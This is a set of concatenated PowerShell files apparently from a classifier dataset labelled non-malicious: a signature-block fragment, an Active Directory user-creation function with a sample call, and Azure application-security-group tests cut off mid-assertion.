sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIEHOpS4PVWQ4xDWsPnAdhUv3 # vLqFisNS08JVRFuwDELWMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAoWK1XBHeHbktrIBees3mGj1ldOVFIoP6C2VIy1TEf2xzdb88/9VA66pF # zmpZ3tCWFB5RbpNvsYXM6sRvtmXoxq22ARSAX8L6XwNxHh1q0mZ7nQFg1pwgdoJo # b/5blfHYqMi3dPNEfhCONWukSPrYqYE688myGCJeh2PPfhi/Xjhoq0Ly+oBuYPix # uFR2MbwO8ivUxlqCuBXr2QRPuuMRPUzMYr5jKwF15TQT4ErnazITOQ5qi5DvC6q9 # /S/wSrqvmPFrhBlL61JS8+bkZT0JMqpFyCEwe9ws3GfOC7/InYuxjtPj+efAi/Mv # HEoq8D5SGo8rJk4Prgh2eTix55kJlaGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAuwH0Zuaonz133Olu0W4uFAF8sKLSOoweP73/DL1C0BQIGZpfQk26i # GBMyMDI0MDczMTA3MDA0Mi4zODRaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OkZDNDEtNEJENC1EMjIwMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzI1WhcNMjUwMTEwMTkwNzI1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpGQzQxLTRC # RDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALVjtZhV+kFmb8cKQpg2mzis # DlRI978Gb2amGvbAmCd04JVGeTe/QGzM8KbQrMDol7DC7jS03JkcrPsWi9WpVwsI # ckRQ8AkX1idBG9HhyCspAavfuvz55khl7brPQx7H99UJbsE3wMmpmJasPWpgF05z # ZlvpWQDULDcIYyl5lXI4HVZ5N6MSxWO8zwWr4r9xkMmUXs7ICxDJr5a39SSePAJR # IyznaIc0WzZ6MFcTRzLLNyPBE4KrVv1LFd96FNxAzwnetSePg88EmRezr2T3HTFE # lneJXyQYd6YQ7eCIc7yllWoY03CEg9ghorp9qUKcBUfFcS4XElf3GSERnlzJsK7s # /ZGPU4daHT2jWGoYha2QCOmkgjOmBFCqQFFwFmsPrZj4eQszYxq4c4HqPnUu4hT4 # aqpvUZ3qIOXbdyU42pNL93cn0rPTTleOUsOQbgvlRdthFCBepxfb6nbsp3fcZaPB # fTbtXVa8nLQuMCBqyfsebuqnbwj+lHQfqKpivpyd7KCWACoj78XUwYqy1HyYnStT # me4T9vK6u2O/KThfROeJHiSg44ymFj+34IcFEhPogaKvNNsTVm4QbqphCyknrwBy # qorBCLH6bllRtJMJwmu7GRdTQsIx2HMKqphEtpSm1z3ufASdPrgPhsQIRFkHZGui # hL1Jjj4Lu3CbAmha0lOrAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQURIQOEdq+7Qds # lptJiCRNpXgJ2gUwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAORURDGrVRTbnulf # sg2cTsyyh7YXvhVU7NZMkITAQYsFEPVgvSviCylr5ap3ka76Yz0t/6lxuczI6w7t # Xq8n4WxUUgcj5wAhnNorhnD8ljYqbck37fggYK3+wEwLhP1PGC5tvXK0xYomU1nU # +lXOy9ZRnShI/HZdFrw2srgtsbWow9OMuADS5lg7okrXa2daCOGnxuaD1IO+65E7 # qv2O0W0sGj7AWdOjNdpexPrspL2KEcOMeJVmkk/O0ganhFzzHAnWjtNWneU11WQ6 # Bxv8OpN1fY9wzQoiycgvOOJM93od55EGeXxfF8bofLVlUE3zIikoSed+8s61NDP+ # x9RMya2mwK/Ys1xdvDlZTHndIKssfmu3vu/a+BFf2uIoycVTvBQpv/drRJD68eo4 # 01mkCRFkmy/+BmQlRrx2rapqAu5k0Nev+iUdBUKmX/iOaKZ75vuQg7hCiBA5xIm5 # ZIXDSlX47wwFar3/BgTwntMq9ra6QRAeS/o/uYWkmvqvE8Aq38QmKgTiBnWSS/uV # PcaHEyArnyFh5G+qeCGmL44MfEnFEhxc3saPmXhe6MhSgCIGJUZDA7336nQD8fn4 # y6534Lel+LuT5F5bFt0mLwd+H5GxGzObZmm/c3pEWtHv1ug7dS/Dfrcd1sn2E4gk # 4W1L1jdRBbK9xwkMmwY+CHZeMSvBMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpG # QzQxLTRCRDQtRDIyMDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAFpuZafp0bnpJdIhfiB1d8pTohm+ggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOpUGaQwIhgPMjAyNDA3MzExMDAyMTJaGA8yMDI0MDgwMTEwMDIxMlowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6lQZpAIBADAHAgEAAgIWlDAHAgEAAgISgTAKAgUA # 6lVrJAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAH13cG6kOg3UO4+kLfMr # dsSkn5Pz4eR228Ukb+ThepXMxdhfLaLWlI2TSEXh+F9+urZXfP+aNzShsT9gjeBi # tY5UifJICrbNx2veSOtxZsf8VP64mbx6Em4qwIBnX5HlxQZmfQG9Y0MW/T33Q7XC # +cS6+Mygpd5fvKJkPv3PEcVSMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgseBokCbeoUpkNtf+0kulVQorc474HtdhKzlHbPOO22wwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCAriSpKEP0muMbBUETODoL4d5LU6I/bjucIZkOJCI9/ # /zCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4pmZ # lfHc4yDrAAEAAAHiMCIEIGLRjvCM29kcWgfIUg/K2HwPYCHanWybsnAUWWPRQoWm # MA0GCSqGSIb3DQEBCwUABIICAA9i7rVQuupOUH4LwLFPrwyeTBkENV4CzH1cee6L # GoJZ1AKXUxfDYPbcYhDfBbJT+7DfqXVnwBYj1SAgn5X8vq/9nbGwrJHYddzLrOuu # WLVZYQNrpSvIIauC4LHpVyFW5mgSzhix8E2BGmB1XQK8zBxJkDdRCzu1STurfXKx # YJm91XjzbOjI+Ym7rigtAaWy6tVhsprWOPyV5XSahLIpTqyDavxnjlGg4yQvHKnH # jRws0qdAs5nHimbzE/wjIAEh9uNyOsqACwDK4kKduCQDZuyUkkqr0/v2N0zlCTNw # 6jgnERotlL72czsfbM9+KiC44KPSQiMHQoHviXc9fsfwK9qQ8srcdcvm/VeWMpFU # 7U6xvsVZ8fMsFqda9A6qV+BuR9YoTtm6NM9lgM/OQ9mGW0PgY5akWSXUtJ5ZgozC # X+IyfocX1qQsD3MfPNnjfy5OtqQmc4p8//ZbRcszeHoVlidPyc8BmaLzCzcdZJSU # xK9Ejt0KaMvHMmZvawjLXc7AEj1P0lY99c332waOZkZlPp6LXW1ItlG/ZzD/n94t # IsARHNBDwzTQT+SeRW73GwKPs4tBZIfLieesTmvwJeXd3lvrNtAPQ+wtdzGmSWT2 # SgnHenro24No47gEguKFi0lV+trO3atrvUpiVsIvEHd7sIYNZwVdH1YCByOMz4RW # 6WSc # SIG # End signature block
combined_dataset/train/non-malicious/New-AdUser.ps1
New-AdUser.ps1
function New-AdUser { param ( [string] $Username = $(throw "Parameter -Username [System.String] is required."), [string] $Password = $(throw "Parameter -Password [System.String] is required."), [string] $OrganizationalUnit = "Users", [string] $DisplayName, [string] $FirstName, [string] $LastName, [string] $Initials, [string] $Description, [switch] $CannotChangePassword, [switch] $PasswordNeverExpires, [switch] $Disabled ) try { $currentDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $dn = $currentDomain.GetDirectoryEntry().distinguishedName $ou = [ADSI] "LDAP://CN=$OrganizationalUnit,$dn" $userAccount = $ou.Create("user", "cn=$Username") $userAccount.SetInfo() $userAccount.userAccountControl = ($userAccount.userAccountControl.Item(0) -bxor 0x0002) #Enable the account $userAccount.SetInfo() # Properties $userAccount.sAMAccountName = $Username $userAccount.SetInfo() $userAccount.userPrincipalName = ("{0}@{1}" -f $Username, $currentDomain.Name) if ($DisplayName) { $userAccount.displayName = $DisplayName } if ($Description) { $userAccount.description = $Description } if ($FirstName) { $userAccount.givenname = $FirstName } if ($LastName) { $userAccount.sn = $LastName } if ($Initials) { $userAccount.initials = $Initials } $userAccount.SetInfo() $userAccount.SetPassword($Password) # Password if ($PasswordNeverExpires) { $userAccount.userAccountControl = ($userAccount.userAccountControl.Item(0) -bxor 0x10000) } if ($CannotChangePassword) { $everyOne = [System.Security.Principal.SecurityIdentifier]'S-1-1-0' $EveryoneDeny = new-object System.DirectoryServices.ActiveDirectoryAccessRule ($Everyone,'ExtendedRight','Deny', [System.Guid]'ab721a53-1e2f-11d0-9819-00aa0040529b') $self = [System.Security.Principal.SecurityIdentifier]'S-1-5-10' $SelfDeny = new-object System.DirectoryServices.ActiveDirectoryAccessRule ($self,'ExtendedRight','Deny', [System.Guid]'ab721a53-1e2f-11d0-9819-00aa0040529b') $userAccount.get_ObjectSecurity().AddAccessRule($selfDeny) $userAccount.get_ObjectSecurity().AddAccessRule($EveryoneDeny) $userAccount.CommitChanges() } $userAccount.SetInfo() if ($Disabled) { $userAccount.userAccountControl = ($userAccount.userAccountControl.Item(0) -bxor 0x0002) } $userAccount.SetInfo() } catch { Write-Error $_ #$ou.Delete("user", "cn=$Username") return $false } return $true } New-AdUser -Username bob -Password 'B0bsP4$$W0rD!@#$%' -Description "Bob's account" -FirstName Bob -LastName Doe -DisplayName "Bob Doe" -Initials R -PasswordNeverExpires -CannotChangePassword -Disabled
combined_dataset/train/non-malicious/3962.ps1
3962.ps1
function Test-ApplicationSecurityGroupCRUD { $rgLocation = Get-ProviderLocation ResourceManagement $resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups" $location = Get-ProviderLocation $resourceTypeParent $rgName = Get-ResourceGroupName $asgName = Get-ResourceName try { $resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" } $job = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName -Location $rgLocation -AsJob $job | Wait-Job $asgNew = $job | Receive-Job Assert-AreEqual $rgName $asgNew.ResourceGroupName Assert-AreEqual $asgName $asgNew.Name Assert-NotNull $asgNew.Location Assert-NotNull $asgNew.Etag $asgGet = Get-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName Assert-AreEqual $rgName $asgGet.ResourceGroupName Assert-AreEqual $asgName $asgGet.Name Assert-NotNull $asgGet.Location Assert-NotNull $asgGet.Etag $asgGet = Get-AzApplicationSecurityGroup -ResourceGroupName "*" Assert-True { $asgGet.Count -ge 0 } $asgGet = Get-AzApplicationSecurityGroup -Name "*" Assert-True { $asgGet.Count -ge 0 } $asgGet = Get-AzApplicationSecurityGroup -ResourceGroupName "*" -Name "*" Assert-True { $asgGet.Count -ge 0 } $asgDelete = Remove-AzApplicationSecurityGroup -Name $asgName -ResourceGroupName $rgName -PassThru -Force Assert-AreEqual $true $asgDelete } finally { Clean-ResourceGroup $rgName } } function Test-ApplicationSecurityGroupCollections { $rgLocation = Get-ProviderLocation ResourceManagement $resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups" $location = Get-ProviderLocation $resourceTypeParent $rgName1 = Get-ResourceGroupName $rgName2 = Get-ResourceGroupName $asgName1 = Get-ResourceName $asgName2 = Get-ResourceName try { $resourceGroup1 = New-AzResourceGroup -Name $rgName1 -Location $location -Tags @{ testtag = "ASG tag" } $resourceGroup2 = New-AzResourceGroup -Name $rgName2 -Location $location -Tags @{ testtag = "ASG tag" } $asg1 = New-AzApplicationSecurityGroup -Name $asgName1 -ResourceGroupName $rgName1 -Location $rgLocation $asg2 = New-AzApplicationSecurityGroup -Name $asgName2 -ResourceGroupName $rgName2 -Location $rgLocation $listRg = Get-AzApplicationSecurityGroup -ResourceGroupName $rgName1 Assert-AreEqual 1 @($listRg).Count Assert-AreEqual $listRg[0].ResourceGroupName $asg1.ResourceGroupName Assert-AreEqual $listRg[0].Name $asg1.Name Assert-AreEqual $listRg[0].Location $asg1.Location Assert-AreEqual $listRg[0].Etag $asg1.Etag $listSub = Get-AzApplicationSecurityGroup $asg1FromList = @($listSub) | Where-Object Name -eq $asgName1 | Where-Object ResourceGroupName -eq $rgName1 Assert-AreEqual $asg1.ResourceGroupName $asg1FromList.ResourceGroupName Assert-AreEqual $asg1.Name $asg1FromList.Name Assert-AreEqual $asg1.Location $asg1FromList.Location Assert-AreEqual $asg1.Etag $asg1FromList.Etag $asg2FromList = @($listSub) | Where-Object Name -eq $asgName2 | Where-Object ResourceGroupName -eq $rgName2 Assert-AreEqual $asg2.ResourceGroupName $asg2FromList.ResourceGroupName Assert-AreEqual $asg2.Name $asg2FromList.Name Assert-AreEqual $asg2.Location $asg2FromList.Location Assert-AreEqual $asg2.Etag $asg2FromList.Etag } finally { Clean-ResourceGroup $rgName1 Clean-ResourceGroup $rgName2 } } function Test-ApplicationSecurityGroupInNewSecurityRule { param([bool] $useIds = $false) $rgLocation = Get-ProviderLocation ResourceManagement $resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups" $location = Get-ProviderLocation $resourceTypeParent $rgName = Get-ResourceGroupName $asgName = Get-ResourceName $nsgName = Get-ResourceName $securityRuleNames = @((Get-ResourceName), (Get-ResourceName), (Get-ResourceName), (Get-ResourceName)) try { $resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" } $asg = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName -Location $rgLocation $securityRules = @() if ($useIds) { $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 100 -Direction Inbound $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 103 -Direction Inbound $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[3] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 104 -Direction Inbound } else { $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 100 -Direction Inbound $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 103 -Direction Inbound $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[3] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 104 -Direction Inbound } $nsg = New-AzNetworkSecurityGroup -name $nsgName -ResourceGroupName $rgName -Location $location -SecurityRule $securityRules Assert-AreEqual $rgName $nsg.ResourceGroupName Assert-AreEqual $nsgName $nsg.Name Assert-NotNull $nsg.Location Assert-NotNull $nsg.Etag Assert-AreEqual 4 @($nsg.SecurityRules).Count $securityRule = @($nsg.SecurityRules) | Where-Object Name -eq $securityRuleNames[0] Assert-Null $securityRule.SourceAddressPrefix Assert-Null $securityRule.DestinationAddressPrefix Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id $securityRule = @($nsg.SecurityRules) | Where-Object Name -eq $securityRuleNames[1] Assert-Null $securityRule.SourceAddressPrefix Assert-AreEqual "*" 